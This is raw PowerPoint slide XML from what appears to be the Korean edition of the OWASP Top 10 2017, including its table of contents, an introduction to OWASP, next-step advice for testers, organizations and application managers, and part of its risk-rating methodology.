                  <a:cubicBezTo>
                    <a:pt x="773043" y="5189820"/>
                    <a:pt x="765092" y="5608316"/>
                    <a:pt x="755283" y="5608316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="56083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5283" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="765092" y="4"/>
                    <a:pt x="773043" y="418500"/>
                    <a:pt x="773043" y="93474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1000" dirty="0"/>
                <a:t>보안전문가는 모든 것을 테스트할 필요는 없습니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>무엇이 중요한지 알아보고 그것에 대한 시간을 더 투자하는 것이 낫습니다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이 말은 보안 방어체계와 자동으로 탐지되는 위험에 대해 보안프로그램의 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>를 확장하는 것을 의미합니다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목표는 당신의 애플리케이션과 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>API</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                <a:t>의 보안이 지속적으로 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확인되는 것이 필수적인 보안 상태로 만드는 것입니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="10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92845" y="6017867"/>
              <a:ext cx="940189" cy="966303"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY0" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX1" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX2" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX3" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY3" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX4" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY4" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX5" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY5" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX6" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY6" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY7" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY8" fmla="*/ 156701 h 9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189" h="966303">
                  <a:moveTo>
                    <a:pt x="0" y="156701"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70157"/>
                    <a:pt x="70157" y="0"/>
                    <a:pt x="156701" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="783488" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="870032" y="0"/>
                    <a:pt x="940189" y="70157"/>
                    <a:pt x="940189" y="156701"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="940189" y="809602"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="940189" y="896146"/>
                    <a:pt x="870032" y="966303"/>
                    <a:pt x="783488" y="966303"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156701" y="966303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70157" y="966303"/>
                    <a:pt x="0" y="896146"/>
                    <a:pt x="0" y="809602"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="1567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baseline="0" dirty="0"/>
                <a:t>적용범위 및 정확성 달성</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="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133034" y="7129113"/>
              <a:ext cx="5608321" cy="782078"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX1" fmla="*/ 644200 w 773043"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5608320"/>
                <a:gd name="connsiteX2" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY2" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX3" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY3" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX4" fmla="*/ 773043 w 773043"/>
                <a:gd name="connsiteY4" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY5" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY6" fmla="*/ 5608320 h 5608320"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 773043"/>
                <a:gd name="connsiteY7" fmla="*/ 128843 h 5608320"/>
                <a:gd name="connsiteX8" fmla="*/ 128843 w 773043"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 56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043" h="5608320">
                  <a:moveTo>
                    <a:pt x="773043" y="934741"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="773043" y="4673579"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="773043" y="5189820"/>
                    <a:pt x="765092" y="5608316"/>
                    <a:pt x="755283" y="5608316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5608316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="56083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5283" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="765092" y="4"/>
                    <a:pt x="773043" y="418500"/>
                    <a:pt x="773043" y="93474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900" kern="1200" baseline="0" dirty="0"/>
                <a:t>아무리 테스트를 잘한다고 하더라도 효율적으로 전달하지 않으면 아무런 의미가 없습니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="1200" baseline="0" dirty="0"/>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
                <a:t>애플리케이션이 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" baseline="0" dirty="0"/>
                <a:t>어떻게 동작하는지 이해를</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" dirty="0"/>
                <a:t> 시켜주어야 합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="1200" dirty="0"/>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" dirty="0"/>
                <a:t>단어가 없이 잘못 전달될 수 있기 때문에 명백히 묘사해야 하고 또한 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
                <a:t>실제 공격 시나리오를 포함해야 합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" dirty="0"/>
                <a:t> 또한 취약점에 대한 발견과 이러한 취약점이 얼마나 위험한지 현실적으로 설명해주어야 합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="1200" dirty="0"/>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" kern="1200" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" dirty="0"/>
                <a:t>마지막으로 일반 문서파일이 아닌 실제 사용하고 있는 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
                <a:t>애플리케이션 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="1200" dirty="0"/>
                <a:t>도구에서 결과물을 제공해야 합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="1200" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" kern="1200" baseline="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92845" y="7032486"/>
              <a:ext cx="940189" cy="966303"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY0" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX1" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX2" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 966303"/>
                <a:gd name="connsiteX3" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY3" fmla="*/ 156701 h 966303"/>
                <a:gd name="connsiteX4" fmla="*/ 940189 w 940189"/>
                <a:gd name="connsiteY4" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX5" fmla="*/ 783488 w 940189"/>
                <a:gd name="connsiteY5" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX6" fmla="*/ 156701 w 940189"/>
                <a:gd name="connsiteY6" fmla="*/ 966303 h 966303"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY7" fmla="*/ 809602 h 966303"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 940189"/>
                <a:gd name="connsiteY8" fmla="*/ 156701 h 9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189" h="966303">
                  <a:moveTo>
                    <a:pt x="0" y="156701"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="70157"/>
                    <a:pt x="70157" y="0"/>
                    <a:pt x="156701" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="783488" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="870032" y="0"/>
                    <a:pt x="940189" y="70157"/>
                    <a:pt x="940189" y="156701"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="940189" y="809602"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="940189" y="896146"/>
                    <a:pt x="870032" y="966303"/>
                    <a:pt x="783488" y="966303"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156701" y="966303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="70157" y="966303"/>
                    <a:pt x="0" y="896146"/>
                    <a:pt x="0" y="809602"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="15670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baseline="0" dirty="0"/>
                <a:t>좋은 결과물</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="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18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77700"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="8001000"/>
          <a:ext cx="6858000" cy="1143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저작권 및 라이선스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Copyright © 2003 – 2017 The OWASP Foundation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문서는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Creative Commons Attribution Share-Alike 4.0 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라이선스의 보호를 받습니다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재사용이나 분배할 경우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저작물에 적용된 저작권을 명시하여야 합니다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3716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y-s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52400" y="8522201"/>
            <a:ext cx="1046163" cy="3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990600"/>
          <a:ext cx="33528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목차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Exo 2" panose="00000500000000000000" pitchFamily="2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860"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buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof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75065"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="990600"/>
          <a:ext cx="3429000" cy="7004304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1600" b="1" dirty="0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에 대하여</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2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Web Application Security Project(OWASP)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조직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신뢰할 수 있는 애플리케이션과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API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유지 관리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 수 있도록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지원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하는 열린 커뮤니티입니다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아래 항목들이 여러분에게 자유롭게 열려 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="95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애플리케이션 보안 도구와 표준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애플리케이션 보안 테스트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보안 코드 개발 및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검토에 </a:t>
                      </a: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관한 좋은 책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발표 자료와 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" u="sng" dirty="0">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>비디오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여러가지 공통 주제의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hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>치트 시트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표준 보안 통제와 라이브러리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  <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>전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hlinkClick r:id="rId8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hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>세계에 퍼져 있는 지부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50" baseline="0" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRP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연구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  <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>세계 여러 곳에서 개최되는 대규모의 컨퍼런스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50" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:hlinkClick r:id="rId10"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR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950" dirty="0" err="1">
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>메일링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hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t> 리스트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더 많은 정보는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hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org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에서 확인하세요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모든 도구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문서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포럼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그리고 지부는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보안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개선하는데 관심 있는 누구에게나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자유롭게 열려 있습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 보안은 사람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기술의 영역을 개선하는 것이 가장 효과적인 접근 방식이기 때문에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 보안을 사람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프로세스 및 기술의 문제로 접근하길 권장합니다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ko-KR" sz="9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latinLnBrk="0"/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새로운 형태의 조직입니다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상업적 목적이 없어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보안에 대한 공정하고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실용적이며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비용 효율적인 정보를 제공할 수 있게 합니다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0"/>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="9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상용 보안 기술의 사용을 지원하지만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떠한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기술 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="ko-KR" sz="95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회사와</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="95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제휴 관계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없습니다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많은 오픈소스 소프트웨어 프로젝트와 유사하게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협업하며 투명하고 열린 방식으로 여러 형태의 자료들을 만들어 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9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재단은 프로젝트의 장기적인 성공을 보장하기 위한 비영리 단체입니다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OWASP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이사회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지부의 리더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리더 및 프로젝트 멤버를 포함한 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관련된 거의 모든 사람들은 자원봉사자입니다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우리는 혁신적인 보안 연구에 대한 보조금과 기반 시설을 제공합니다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9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OWASP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와 함께 하시기 바랍니다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!</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="95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TOC</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="3600" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea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목차</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRP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72203"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1432560"/>
          <a:ext cx="3383280" cy="5958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9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TOC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대하여 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..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……...…………………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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>1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FW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서문</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="95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……..……..………………...………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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>2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ko-KR" altLang="en-US" sz="9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소개글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..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……………..……………….……..…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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>3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ko-KR" altLang="en-US" sz="9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릴리즈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노트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="95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…..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…………..………….…..…..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 action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>4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Risk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..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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>5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T10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	OWASP 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보안</a:t>
                      </a:r>
                      <a:b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</a:b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	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– 2017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…………..……….....….……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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>6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A1:2017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인젝션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…….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…………..………………………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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>7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A2:2017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취약한 인증</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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……………..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……………………...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9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>8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A3:2017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민감한 데이터 노출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…..….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…………………..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0" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>9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A4:2017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XML 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외부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개체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(XXE) ……………………...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1" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>10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A5:2017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취약한 접근 통제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……..……………......…..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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>11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 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잘못된 보안 구성 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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……………………..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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>12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A7:2017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크로스</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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사이트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noProof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(XSS) ..….………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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>13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A8:2017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안전하지 않은 역직렬화 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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…………………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5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>14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A9:2017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알려진 취약점이 있는 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="95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              구성요소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사용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.……………...……………</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="mr-IN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6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>15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A10:2017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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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불충분한 로깅 및 모니터링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…….</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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…..…..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7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>16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+D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개발자를 위한 다음 단계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….………..…..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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>17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+T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 테스터를 위한 다음 단계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.……..….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29" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>18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+O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조직을 위한 다음 단계 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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…………..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…...……....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0" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>19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+A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관리자를 위한 다음 단계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....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1" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>20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+R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위험에 대한 참고 사항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….……………….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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>21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+RF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 요인에 대한 세부 정보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..…………..…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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>22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+DAT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방법론 및 데이터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…….…..…………………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4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>23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+ACK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ko-KR" alt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감사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인사 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="95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...………..</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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………………..………….</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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35" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>24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2544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79197"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="971600"/>
          <a:ext cx="6858000" cy="800099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바로 지금 애플리케이션 보안 프로그램을 시작하십시오</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD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애플리케이션 보안은 더 이상 옵션이 아닙니다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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>증가하는 공격과 규제 압력 사이에서 조직은 애플리케이션을 보호하기 위해  효율적인 절차와 기술을 갖추고 있어야 합니다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생산에서 애플리케이션들과 코드라인들의 엄청난 수를 감안할 때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많은 조직들은 엄청난 양의 취약점들을 관리하기 위해 고심하고 있습니다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OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>는 조직이 애플리케이션 보안 프로그램과 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" baseline="0" dirty="0"/>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>를 통해 통찰력을 얻고 보안을 향상시키길 권고하고 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" baseline="0" dirty="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>애플리케이션 보안을 성취하기 위해서는 많은 다른 조직의 파트들이 공동 노력이 필요합니다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보안은 가시성과 측정가능성을 요구하고 있는데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 그 이유는 많은 참가자들이 볼 수 있고 조직의 애플리케이션 보안 상태를 이해할 수 있기 때문입니다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비용적으로 효과적으로 위험을 줄이고 기업의 보안 수준을 향상 시키기 위해 활동과 결과에 초점을 맞추십시오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en-US" altLang="ko-KR" sz="1000" baseline="0" dirty="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP SAMM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>과 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>최고 보안 경영자를 위한 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" baseline="0" dirty="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>애플리케이션 보안 가이드</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" baseline="0" dirty="0"/>
                        <a:t>는 이 목록에서 가장 중요한 활동의 자원입니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" baseline="0" dirty="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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조직을 위한 다음 단계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10932096"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-981490" y="2771800"/>
          <a:ext cx="8686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707886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+O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6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79572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전체 애플리케이션 라이프사이클 관리하십시오</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD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애플리케이션은 사람이 만든 가장 복잡한 시스템에 속합니다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애플리케이션의 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IT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적 관리는 전반적인 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IT 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라이프사이클을 담당하는 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IT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전문가가 수행해야만 합니다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관리자 역할을 설정할 때 애플리케이션 소유자와 기술적으로 상응하는 사람으로 설정하는 것이 좋습니다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관리자는 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IT </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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요구사항 수집부터 시스템이 폐기될 때까지 전체 애플리케이션 라이프사이클을 담당합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="9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b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</a:br>
                      <a:endParaRPr lang="en-AU" sz="9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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>+A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애플리케이션 관리자를 위한 다음 단계</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1206313183"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2141730"/>
          <a:ext cx="6858000" cy="693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3835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01952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취약점을 드러내는 위험에 관한 것 입니다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7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위험평가방법론은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OWASP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위험평가 방법론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기반으로 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TOP 10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에서는 공통 취약점에 대한 일반적인 웹 애플리케이션에서 일어날법한 요인을 살펴봄으로써 위험을 예측했습니다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 후 애플리케이션에 가장 큰 위험을 초래하는 약점에 따라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설정하였습니다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Top 10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위험요소가 바뀌고 진화함에 따라 지속적으로 업데이트 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OWASP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위험 평가 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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방법론</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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식별된 취약점의 위험을 계산하는 데 도움이 되는 여러가지 요소를 정의합니다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하지만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실제 애플리케이션 및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API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특정 취약점보다는 일반적인 것들에 대해 다뤄야 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결과적으로 애플리케이션의 위험을 계산할 때 애플리케이션 소유자 또는 관리자가 계산하는 것 보다는 정확할 수 없습니다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여러분은 애플리케이션 및 데이터의 중요성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위협 요소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시스템 구축 및 운영방법을 판단할 수 있는 최고의 장비를 갖추고 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방법론에는 각 취약점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, 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과 영향 요인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기술적 영향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대한 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가지 기능성 요소가 포함됩니다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각 요소에 대한 위험도는 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1-Low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3-High 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범위이며 각 요소에 대한 전문 용어가 있습니다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약점의 출현성은 일반적으로 계산할 필요가 없는 요소입니다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출현데이터에 대해서는 여러 조직의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="950" baseline="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출현성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통계가 제공되었으므로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(25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페이지 참조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데이터를 종합하여 상위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개의 일어날법한 출현 목록을 작성했습니다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데이터는 다른 취약성에 대한 가능성 등급을 계산하기 위해 다른 두 요소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탐지 가능성 및 공격 가능성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결합되었습니다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어떤 일이 일어날 가능성에 대한 등급은 각 항목에 대한 예상 평균 기술적 영향을 곱하여 상위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항목의 전반적인 위험 순위를 산출했습니다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.(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결과값이 높을 수록 위험이 높음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).</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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 가능성 및 영향은 상위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범주와 관련 보고된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CVE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분석하여 계산되었습니다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Note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접근방식에서는 </a:t>
                      </a:r>
                      <a:r>
